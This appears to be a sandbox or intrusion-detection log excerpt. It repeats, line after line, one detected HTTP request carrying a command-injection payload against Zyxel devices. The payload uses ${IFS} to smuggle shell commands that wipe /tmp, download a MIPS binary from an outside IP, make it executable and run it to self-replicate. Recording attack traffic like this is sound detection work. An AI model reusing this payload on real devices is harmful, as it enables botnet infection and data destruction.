      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
